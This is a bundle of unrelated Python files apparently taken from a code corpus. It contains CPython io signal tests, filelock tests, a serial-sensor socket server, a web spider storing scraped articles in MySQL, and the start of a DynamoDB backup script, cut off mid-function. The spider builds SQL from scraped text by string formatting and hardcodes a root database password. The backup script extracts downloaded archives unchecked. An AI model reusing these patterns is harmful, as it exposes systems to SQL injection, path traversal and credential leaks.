def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
test.py
|
#!/usr/bin/env python
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org>
"""
Some tests for the file lock.
"""
import os
import sys
import unittest
import threading
import errno
import filelock
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
class ExThread(threading.Thread):
def __init__(self, *args, **kargs):
threading.Thread.__init__(self, *args, **kargs)
self.ex = None
return None
def run(self):
try:
threading.Thread.run(self)
except:
self.ex = sys.exc_info()
return None
def join(self):
threading.Thread.join(self)
if self.ex is not None:
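# Re-raise the exception captured in run() so it surfaces in the joining thread.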
if PY3:
raise self.ex[0].with_traceback(self.ex[1], self.ex[2])
elif PY2:
wrapper_ex = self.ex[1]
raise (wrapper_ex.__class__, wrapper_ex, self.ex[2])
return None
class BaseTest(object):
"""
Base class for all filelock tests.
"""
# The filelock type (class), which is tested.
LOCK_TYPE = None
# The path to the lockfile.
LOCK_PATH = "test.lock"
def setUp(self):
"""Deletes the potential lock file at :attr:`LOCK_PATH`."""
try:
os.remove(self.LOCK_PATH)
except OSError as e:
# FileNotFound
if e.errno != errno.ENOENT:
raise
return None
def tearDown(self):
"""Deletes the potential lock file at :attr:`LOCK_PATH`."""
try:
os.remove(self.LOCK_PATH)
except OSError as e:
# FileNotFound
if e.errno != errno.ENOENT:
raise
return None
def test_simple(self):
"""
Asserts that the lock is held inside a with-statement and that the
return value of the *__enter__* method is the lock itself.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
with lock as l:
self.assertTrue(lock.is_locked)
self.assertTrue(lock is l)
self.assertFalse(lock.is_locked)
return None
def test_nested(self):
"""
Asserts that the lock is not released until the outermost
with-statement that acquired it is exited.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
with lock as l1:
self.assertTrue(lock.is_locked)
self.assertTrue(lock is l1)
with lock as l2:
self.assertTrue(lock.is_locked)
self.assertTrue(lock is l2)
with lock as l3:
self.assertTrue(lock.is_locked)
self.assertTrue(lock is l3)
self.assertTrue(lock.is_locked)
self.assertTrue(lock.is_locked)
self.assertFalse(lock.is_locked)
return None
def test_nested1(self):
"""
The same as *test_nested*, but this method uses the *acquire()* method
to take the lock, rather than the implicit *__enter__* method.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
with lock.acquire() as l1:
self.assertTrue(lock.is_locked)
self.assertTrue(lock is l1)
with lock.acquire() as l2:
self.assertTrue(lock.is_locked)
self.assertTrue(lock is l2)
with lock.acquire() as l3:
self.assertTrue(lock.is_locked)
self.assertTrue(lock is l3)
self.assertTrue(lock.is_locked)
self.assertTrue(lock.is_locked)
self.assertFalse(lock.is_locked)
return None
def test_nested_forced_release(self):
"""
Acquires the lock using a with-statement and releases the lock
before leaving the with-statement.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
with lock:
self.assertTrue(lock.is_locked)
lock.acquire()
self.assertTrue(lock.is_locked)
lock.release(force = True)
self.assertFalse(lock.is_locked)
self.assertFalse(lock.is_locked)
return None
def test_threaded(self):
"""
Runs 250 threads that all use the same file lock. The lock must be
held whenever at least one thread needs it, and released as soon as
all threads have finished.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
def my_thread():
for i in range(100):
with lock:
self.assertTrue(lock.is_locked)
return None
NUM_THREADS = 250
threads = [ExThread(target = my_thread) for i in range(NUM_THREADS)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertFalse(lock.is_locked)
return None
def test_threaded1(self):
"""
Runs multiple threads, which acquire the same lock file with different
FileLock objects. While thread group 1 holds the lock, thread group 2
must not hold it.
"""
def thread1():
"""
Requires lock1.
"""
for i in range(1000):
with lock1:
self.assertTrue(lock1.is_locked)
self.assertFalse(lock2.is_locked) # FIXME (Filelock)
return None
def thread2():
"""
Requires lock2.
"""
for i in range(1000):
with lock2:
self.assertFalse(lock1.is_locked) # FIXME (FileLock)
self.assertTrue(lock2.is_locked)
return None
NUM_THREADS = 10
lock1 = self.LOCK_TYPE(self.LOCK_PATH)
lock2 = self.LOCK_TYPE(self.LOCK_PATH)
threads1 = [ExThread(target = thread1) for i in range(NUM_THREADS)]
threads2 = [ExThread(target = thread2) for i in range(NUM_THREADS)]
for i in range(NUM_THREADS):
threads1[i].start()
threads2[i].start()
for i in range(NUM_THREADS):
threads1[i].join()
threads2[i].join()
self.assertFalse(lock1.is_locked)
self.assertFalse(lock2.is_locked)
return None
def test_timeout(self):
"""
Tests that acquiring the lock raises a Timeout error when it cannot be acquired.
"""
lock1 = self.LOCK_TYPE(self.LOCK_PATH)
lock2 = self.LOCK_TYPE(self.LOCK_PATH)
# Acquire lock 1.
lock1.acquire()
self.assertTrue(lock1.is_locked)
self.assertFalse(lock2.is_locked)
# Try to acquire lock 2.
self.assertRaises(filelock.Timeout, lock2.acquire, timeout=1) # FIXME (Filelock)
self.assertFalse(lock2.is_locked)
self.assertTrue(lock1.is_locked)
# Release lock 1.
lock1.release()
self.assertFalse(lock1.is_locked)
self.assertFalse(lock2.is_locked)
return None
def test_default_timeout(self):
"""
Tests that the default timeout parameter works.
"""
lock1 = self.LOCK_TYPE(self.LOCK_PATH)
lock2 = self.LOCK_TYPE(self.LOCK_PATH, timeout = 1)
self.assertEqual(lock2.timeout, 1)
# Acquire lock 1.
lock1.acquire()
self.assertTrue(lock1.is_locked)
self.assertFalse(lock2.is_locked)
# Try to acquire lock 2.
self.assertRaises(filelock.Timeout, lock2.acquire) # FIXME (SoftFileLock)
self.assertFalse(lock2.is_locked)
self.assertTrue(lock1.is_locked)
lock2.timeout = 0
self.assertEqual(lock2.timeout, 0)
self.assertRaises(filelock.Timeout, lock2.acquire)
self.assertFalse(lock2.is_locked)
self.assertTrue(lock1.is_locked)
# Release lock 1.
lock1.release()
self.assertFalse(lock1.is_locked)
self.assertFalse(lock2.is_locked)
return None
def test_context(self):
"""
Tests that the file lock is released when an exception is raised
inside a with-statement.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
try:
with lock as lock1:
self.assertIs(lock, lock1)
self.assertTrue(lock.is_locked)
raise Exception()
except:
self.assertFalse(lock.is_locked)
return None
def test_context1(self):
"""
The same as *test_context()*, but uses the *acquire()* method.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
try:
with lock.acquire() as lock1:
self.assertIs(lock, lock1)
self.assertTrue(lock.is_locked)
raise Exception()
except:
self.assertFalse(lock.is_locked)
return None
def test_del(self):
"""
Tests that the lock is released when the lock object is deleted.
"""
lock1 = self.LOCK_TYPE(self.LOCK_PATH)
lock2 = self.LOCK_TYPE(self.LOCK_PATH)
# Acquire lock 1.
lock1.acquire()
self.assertTrue(lock1.is_locked)
self.assertFalse(lock2.is_locked)
# Try to acquire lock 2.
self.assertRaises(filelock.Timeout, lock2.acquire, timeout = 1) # FIXME (SoftFileLock)
# Delete lock 1 and try to acquire lock 2 again.
del lock1
lock2.acquire()
self.assertTrue(lock2.is_locked)
lock2.release()
return None
class FileLockTest(BaseTest, unittest.TestCase):
"""
Tests the hard file lock, which is available on the current platform.
"""
LOCK_TYPE = filelock.FileLock
LOCK_PATH = "test.lock"
class SoftFileLockTest(BaseTest, unittest.TestCase):
"""
Tests the soft file lock, which is always available.
"""
LOCK_TYPE = filelock.SoftFileLock
LOCK_PATH = "test.softlock"
def test_cleanup(self):
"""
Tests if the lock file is removed after use.
"""
lock = self.LOCK_TYPE(self.LOCK_PATH)
with lock:
self.assertTrue(os.path.exists(self.LOCK_PATH))
self.assertFalse(os.path.exists(self.LOCK_PATH))
return None
if __name__ == "__main__":
unittest.main()
|
process_worker.py
|
# coding=utf-8
import multiprocessing
import serial
import socket
import os
import fuckargs
# Outputs 1 when the sensor is triggered
# and 0 when nothing is detected.
# Communication happens over the serial port;
# the update rate is determined by the hardware's serial transmission rate.
def get_serial_info( whether ):
os.system( "echo %d >>pid_repo" % os.getpid() ) # store the pid
while True:
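# Each line from the device is expected to start with '1' (sensor triggered)
# or '0' (idle); only that first byte is kept in the shared value.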
whether.value = ser.readline()[0]
# socket server
def socket_server( whether ):
os.system( "echo %d >>pid_repo" % os.getpid() ) # store the pid
host = fuckargs.get( "host" ) # Symbolic name meaning all available interfaces
port = int( fuckargs.get("port") ) # Arbitrary non-privileged port
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) # TCP socket for network communication
s.bind( (host, port) ) # bind the socket to the given IP and port
s.listen( 5 ) # start listening for TCP connections
while True:
conn, addr = s.accept() # accept a TCP connection; returns a new socket and the client address
# print 'Connected by', addr  # log the client's IP address
try:
while True:
data=conn.recv(1024) # receive up to 1024 bytes from the client
res = whether.value
conn.sendall( res )
except:
conn.close() # close the connection
# Main process
ser = serial.Serial( fuckargs.get("usb"), int( fuckargs.get("bits") ) )
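# Shared one-character value handed to both worker processes started below
# (note that the name 'chr' shadows the built-in of the same name).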
chr = multiprocessing.Value('c', '0')
os.system( "echo %d >>pid_repo" % os.getpid() ) # store the pid
p_serial = multiprocessing.Process( target=get_serial_info, args=(chr,) )
p_socket = multiprocessing.Process( target=socket_server, args=(chr,) )
p_serial.start()
p_socket.start()
|
spider_handlers.py
|
"""Spider (web crawler) model library."""
import re, time, logging, uuid, pymysql
from sqlalchemy import text
from app.models.base import Base2
import threading
import urllib.request
from bs4 import BeautifulSoup
logging.basicConfig(level=logging.DEBUG)
__author__ = "带土"
class Spider(Base2):
def __init__(self):
self.count = 0
super().__init__()
def spiderMain(self):
'''Main entry point: runs the list spider, then the content spider.'''
# Create the list spider thread listSpiderThread
listSpiderThread = threading.Thread(target=self.listSpiderThreadBody, name="ListSpiderThread")
# Start listSpiderThread and wait for it to finish
listSpiderThread.start()
listSpiderThread.join()
# Create the content spider thread contentSpiderThread
contentSpiderThread = threading.Thread(target=self.contentSpiderThreadBody, name="ContentSpiderThread")
# Start contentSpiderThread and wait for it to finish
contentSpiderThread.start()
contentSpiderThread.join()
return self.count
def listSpiderThreadBody(self):
''' Thread body for the list spider. '''
t = threading.current_thread()
print("List spider thread started", t.name)
postArr = self.get_ire_posts()
blogPostArr = self.get_single_list()
pastsNameArr = []
for item in blogPostArr:
pastsNameArr.append(item["name"])
self.count = self.insert_single_list(postArr, pastsNameArr)
print("List spider thread finished", t.name, self.count)
def contentSpiderThreadBody(self):
''' Thread body for the article content spider. '''
t = threading.current_thread()
print("Content spider thread started", t.name)
spiderContentList = self.get_spider_content_list()
self.count = 0
for n in range(len(spiderContentList)):
url = spiderContentList[n]["url"]
content = self.get_ire_content(url)
obj = {
"content": content,
"url": url,
}
print(obj["url"], obj["content"])
self.count += self.update_single_data(obj)
print("Iteration {0} of thread {1}, {2} rows updated".format(n, t.name, self.count))
time.sleep(0.4)
print("Content spider thread finished", t.name)
# Crawl the content of a single article
def get_ire_content(self, url):
req = urllib.request.Request(url)
article = ""
arr = []
with urllib.request.urlopen(req) as res:
data = res.read()
htmlStr = data.decode("gbk")
soup = BeautifulSoup(htmlStr, 'html.parser')
arr = soup.select('.m-article p')
for item in arr:
article += str(item)
return re.sub(r'"', '\'', article)
# Crawl the article list
def get_ire_posts(self):
url = "http://column.iresearch.cn/"
req = urllib.request.Request(url)
with urllib.request.urlopen(req) as res:
data = res.read()
htmlStr = data.decode("gbk")
soup = BeautifulSoup(htmlStr, 'html.parser')
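# Select the list items of the column block identified by its data attribute
# (rootId=2&classId=101) on column.iresearch.cn.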
liArr = soup.select('div[data="rootId=2&classId=101"] li')
postArr = []
for item in liArr:
obj = {}
obj["name"] = str.strip(item.find("h3").find("a").get_text())
summary = str.strip(item.find("p").get_text())
obj["summary"] = summary.strip('\n\r ')
dt = str.strip(item.find("span").get_text())
timeArray = time.strptime(dt, "%Y/%m/%d %H:%M:%S")
obj["created_at"] = '%f' % time.mktime(timeArray)
obj["content"] = str.strip(item.find("h3").find("a").get("href"))
obj["url"] = str.strip(item.find("h3").find("a").get("href"))
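# Unique id: zero-padded millisecond timestamp + random UUID hex + '000' suffix.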
obj["id"] = str('%015d%s000' % (int(time.time() * 1000), uuid.uuid4().hex))
obj["user_id"] = "00158855657446102ff7cb03a1e4bb08db58fa8acaf7440000"
obj["user_name"] = "spider"
obj["user_image"] = "about:blank"
postArr.append(obj)
return postArr
def get_single_list(self):
""" Fetch the existing blog list from the database. """
# 1. Open the database connection
connection = pymysql.connect(host='127.0.0.1',
port=3306,
user='root',
password='mapei123',
db='awesome',
charset='utf8')
# Data to return
data = []
try:
# 2. Create a cursor object
with connection.cursor() as cursor:
# 3. Execute the SQL statement
sql = 'select id,name,summary,content,created_at,user_name from blogs order by created_at desc'
cursor.execute(sql)
# 4. Fetch the result set
result_set = cursor.fetchall()
for row in result_set:
fields = {}
fields['id'] = row[0]
fields['name'] = row[1]
fields['summary'] = row[2]
fields['content'] = row[3]
fields['created_at'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(row[4]))
fields['user_name'] = row[5]
data.append(fields)
except pymysql.DatabaseError as error:
print('Query failed: ' + str(error))
finally:
# 6. Close the database connection
connection.close()
return data
def update_single_data(self, obj):
""" Update one article's content in the database. """
# 1. Open the database connection
connection = pymysql.connect(host='127.0.0.1',
port=3306,
user='root',
password='mapei123',
db='awesome',
charset='utf8')
affectedCount = 0
try:
# 2. Create a cursor object
with connection.cursor() as cursor:
# 3. Execute the SQL statement
sql = 'update blogs set content = "{0}" WHERE content = "{1}"'.format(obj["content"], obj["url"])
affectedCount = cursor.execute(sql)
logging.info(f"Rows affected: {affectedCount}")
# 4. Commit the transaction
connection.commit()
except pymysql.DatabaseError as error:
# 5. Roll back the transaction
connection.rollback()
logging.debug('Update failed: ' + str(error))
finally:
# 6. Close the database connection
connection.close()
return affectedCount
def get_spider_content_list(self):
""" Find crawled articles whose content field still holds the source URL. """
# 1. Open the database connection
connection = pymysql.connect(host='127.0.0.1',
port=3306,
user='root',
password='mapei123',
db='awesome',
charset='utf8')
# Data to return
data = []
try:
# 2. Create a cursor object
with connection.cursor() as cursor:
# 3. Execute the SQL statement
sql = 'SELECT id,content FROM blogs WHERE content LIKE "http://%"'
cursor.execute(sql)
# 4. Fetch the result set
result_set = cursor.fetchall()
for row in result_set:
fields = {}
fields['id'] = row[0]
fields['url'] = row[1]
data.append(fields)
except pymysql.DatabaseError as error:
print('Query failed: ' + str(error))
finally:
# 6. Close the database connection
connection.close()
return data
def insert_single_list(self, list, pastsIdArr):
""" Insert crawled articles that are not already present (matched by name). """
# 1. Open the database connection
connection = pymysql.connect(host='127.0.0.1',
port=3306,
user='root',
password='mapei123',
db='awesome',
charset='utf8')
affectedCount = 0
valStr = ""
for item in list:
if item["name"] not in pastsIdArr:
valStr += f',(\'{item["id"]}\',\'{item["user_id"]}\',\'{item["user_name"]}\',\'{item["user_image"]}\',\'{item["name"]}\',\'{item["summary"]}\',\'{item["content"]}\',\'{item["created_at"]}\')'
try:
# 2. Create a cursor object
with connection.cursor() as cursor:
# 3. Execute the SQL statement
sql = 'insert into blogs ' \
'(id,user_id,user_name,user_image,name,summary,content,created_at)' \
' VALUES ' + valStr[1:]
print("sql", sql)
affectedCount = cursor.execute(sql)
logging.info(f"Rows affected: {affectedCount}")
# 4. Commit the transaction
connection.commit()
except pymysql.DatabaseError as error:
# 5. Roll back the transaction
connection.rollback()
logging.debug('Insert failed: ' + str(error))
finally:
# 6. Close the database connection
connection.close()
return affectedCount
|
dynamodump.py
|
#!/usr/bin/env python
"""
Simple backup and restore script for Amazon DynamoDB using boto to work similarly to mysqldump.
Suitable for DynamoDB usages of smaller data volume which do not warrant the usage of AWS
Data Pipeline for backup/restores/empty.
dynamodump supports local DynamoDB instances as well (tested with dynalite).
"""
import argparse
import fnmatch
import json
import logging
import os
import shutil
import threading
import datetime
import errno
import sys
import time
import re
import zipfile
import tarfile
try:
from queue import Queue
except ImportError:
from Queue import Queue
try:
from urllib.request import urlopen
from urllib.error import URLError, HTTPError
except ImportError:
from urllib2 import urlopen, URLError, HTTPError
import boto3
from boto3_type_annotations.dynamodb import Client as DynamodbClient
from boto3_type_annotations.sts import Client as StsClient
from boto3_type_annotations.s3 import Client as S3Client
JSON_INDENT = 2
AWS_SLEEP_INTERVAL = 10 # seconds
LOCAL_SLEEP_INTERVAL = 1 # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15 # seconds
MAX_BATCH_WRITE = 25 # DynamoDB limit
SCHEMA_FILE = "schema.json"
DATA_DIR = "data"
MAX_RETRY = 6
LOCAL_REGION = "local"
LOG_LEVEL = "INFO"
DATA_DUMP = "dump"
RESTORE_WRITE_CAPACITY = 25
THREAD_START_DELAY = 1 # seconds
CURRENT_WORKING_DIR = os.getcwd()
DEFAULT_PREFIX_SEPARATOR = "-"
MAX_NUMBER_BACKUP_WORKERS = 25
METADATA_URL = "http://169.254.169.254/latest/meta-data/"
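# Monkey-patch json encoding so datetime values serialize as ISO-8601 strings;
# any other type the encoder cannot handle falls back to null instead of raising.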
json.JSONEncoder.default = lambda self,obj: (obj.isoformat() if isinstance(obj, datetime.datetime) else None)
def _get_aws_client(
service: str,
profile: str = None,
region: str = None,
secret_key: str = None,
access_key: str = None,
):
"""
Build connection to some AWS service.
"""
if region:
aws_region = region
else:
aws_region = os.getenv("AWS_DEFAULT_REGION")
# Fallback to querying metadata for region
if not aws_region:
try:
azone = urlopen(
METADATA_URL + "placement/availability-zone",
data=None,
timeout=5
).read().decode()
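# The metadata service returns an availability zone such as "us-east-1a";
# dropping the trailing letter yields the region name.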
aws_region = azone[:-1]
except HTTPError as e:
logging.exception("Error determining region used for AWS client. Typo in code?\n\n" +
str(e))
sys.exit(1)
except URLError:
logging.exception("Timed out connecting to metadata service.\n\n")
sys.exit(1)
if profile:
session = boto3.Session(
profile_name=profile,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
)
client = session.client(service, region_name=aws_region)
else:
client = boto3.client(service,
region_name=aws_region,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
)
return client
def get_table_name_by_tag(profile, region, tag):
"""
Using provided connection to dynamodb and tag, get all tables that have provided tag
Profile provided and, if needed, used to build connection to STS.
"""
matching_tables = []
all_tables = []
sts: StsClient = _get_aws_client(profile=profile, region=region, service="sts")
dynamo: DynamodbClient = _get_aws_client(profile=profile, region=region, service="dynamodb")
account_number = sts.get_caller_identity().get("Account")
paginator = dynamo.get_paginator(operation_name="list_tables")
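# The tag argument is expected in "Key=Value" form.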
tag_key = tag.split("=")[0]
tag_value = tag.split("=")[1]
get_all_tables = paginator.paginate()
for page in get_all_tables:
for table in page["TableNames"]:
all_tables.append(table)
logging.debug("Found table " + table)
for table in all_tables:
table_arn = "arn:aws:dynamodb:{}:{}:table/{}".format(region, account_number, table)
table_tags = dynamo.list_tags_of_resource(
ResourceArn=table_arn
)
for found_tag in table_tags["Tags"]:
if found_tag["Key"] == tag_key:
logging.debug("Checking table " + table + " tag " + found_tag["Key"])
if found_tag["Value"] == tag_value:
matching_tables.append(table)
logging.info("Matched table " + table)
return matching_tables
def do_put_bucket_object(profile, region, bucket, bucket_object):
"""
Put object into bucket. Only called if we've also created an archive file with do_archive()
Bucket must exist prior to running this function.
profile could be None.
bucket_object is file to be uploaded
"""
s3: S3Client = _get_aws_client(profile=profile, region=region, service="s3")
logging.info("Uploading backup to S3 bucket " + bucket)
try:
s3.upload_file(bucket_object, bucket, bucket_object,
ExtraArgs={
"ServerSideEncryption": "AES256"
})
except s3.exceptions.ClientError as e:
logging.exception("Failed to put file to S3 bucket\n\n" + str(e))
sys.exit(1)
def do_get_s3_archive(profile, region, bucket, table, archive):
"""
Fetch latest file named filename from S3
Bucket must exist prior to running this function.
filename is args.dumpPath. File would be "args.dumpPath" with suffix .tar.bz2 or .zip
"""
s3: S3Client = _get_aws_client(profile=profile, region=region, service="s3")
if archive:
if archive == "tar":
archive_type = "tar.bz2"
else:
archive_type = "zip"
# Make sure bucket exists before continuing
try:
s3.head_bucket(
Bucket=bucket
)
except s3.exceptions.ClientError as e:
logging.exception("S3 bucket " + bucket + " does not exist. "
"Can't get backup file\n\n" + str(e))
sys.exit(1)
try:
contents = s3.list_objects_v2(
Bucket=bucket,
Prefix=args.dumpPath
)
except s3.exceptions.ClientError as e:
logging.exception("Issue listing contents of bucket " + bucket + "\n\n" + str(e))
sys.exit(1)
# Script will always overwrite older backup. Bucket versioning stores multiple backups.
# Therefore, just get item from bucket based on table name since that's what we name the files.
filename = None
for d in contents["Contents"]:
if d["Key"] == "{}/{}.{}".format(args.dumpPath, table, archive_type):
filename = d["Key"]
if not filename:
logging.exception("Unable to find file to restore from. "
"Confirm the name of the table you're restoring.")
sys.exit(1)
output_file = "/tmp/" + os.path.basename(filename)
logging.info("Downloading file " + filename + " to " + output_file)
s3.download_file(bucket, filename, output_file)
# Extract archive based on suffix
if tarfile.is_tarfile(output_file):
try:
logging.info("Extracting tar file...")
with tarfile.open(name=output_file, mode="r:bz2") as a:
a.extractall(path=".")
except tarfile.ReadError as e:
logging.exception("Error reading downloaded archive\n\n" + str(e))
sys.exit(1)
except tarfile.ExtractError as e:
# ExtractError is raised for non-fatal errors on extract method
logging.error("Error during extraction: " + str(e))
# Assuming zip file here since we're only supporting tar and zip at this time
else:
try:
logging.info("Extracting zip file...")
with zipfile.ZipFile(output_file, "r") as z:
z.extractall(path=".")
except zipfile.BadZipFile as e:
logging.exception("Problem extracting zip file\n\n" + str(e))
sys.exit(1)
def do_archive(archive_type, dump_path):
"""
Create compressed archive of dump_path.
Accepts archive_type of zip or tar and requires dump_path, directory added to archive
"""
archive_base = dump_path
if archive_type.lower() == "tar":
archive = archive_base + ".tar.bz2"
try:
logging.info("Creating tar file " + archive + "...")
with tarfile.open(name=archive, mode="w:bz2") as a:
for root, dirs, files in os.walk(archive_base):
for file in files:
a.add(os.path.join(root, file))
return True, archive
except tarfile.CompressionError as e:
logging.exception("compression method is not supported or the data cannot be"
" decoded properly.\n\n" + str(e))
sys.exit(1)
except tarfile.TarError as e:
logging.exception("Error creating tarfile archive.\n\n" + str(e))
sys.exit(1)
elif archive_type.lower() == "zip":
try:
logging.info("Creating zip file...")
archive = archive_base + ".zip"
with zipfile.ZipFile(archive, "w") as z:
for root, dirs, files in os.walk(archive_base):
for file in files:
z.write(os.path.join(root, file))
return True, archive
except zipfile.BadZipFile as e:
logging.exception("Problem creating zip file\n\n" + str(e))
sys.exit(1)
except zipfile.LargeZipFile:
logging.exception("Zip file would be too large. Update code to use Zip64 to continue.")
sys.exit(1)
else:
logging.error("Unsupported archive format received. Probably shouldn't have "
"made it to this code path. Skipping attempt at creating archive file")
return False, None
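# Hedged usage sketch (illustrative only, not called anywhere in this script):
# do_archive() returns a (created, archive_path) tuple, so callers should check the
# flag before uploading anything. The wrapper name below is hypothetical.
def _archive_and_maybe_upload(archive_type, dump_path, profile, region, bucket):
    created, archive_path = do_archive(archive_type, dump_path)
    if created and bucket:
        do_put_bucket_object(profile, region, bucket, archive_path)
    return created, archive_path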
def get_table_name_matches(conn, table_name_wildcard, separator):
"""
Find tables to backup
"""
all_tables = []
last_evaluated_table_name = None
while True:
optional_args = {}
if last_evaluated_table_name is not None:
optional_args['ExclusiveStartTableName'] = last_evaluated_table_name
table_list = conn.list_tables(**optional_args)
all_tables.extend(table_list["TableNames"])
try:
last_evaluated_table_name = table_list["LastEvaluatedTableName"]
except KeyError:
break
matching_tables = []
for table_name in all_tables:
if fnmatch.fnmatch(table_name, table_name_wildcard):
logging.info("Adding %s", table_name)
matching_tables.append(table_name)
return matching_tables
def get_restore_table_matches(table_name_wildcard, separator):
"""
Find tables to restore
"""
matching_tables = []
try:
dir_list = os.listdir("./" + args.dumpPath)
except OSError:
logging.info("Cannot find \"./%s\", Now trying current working directory.."
% args.dumpPath)
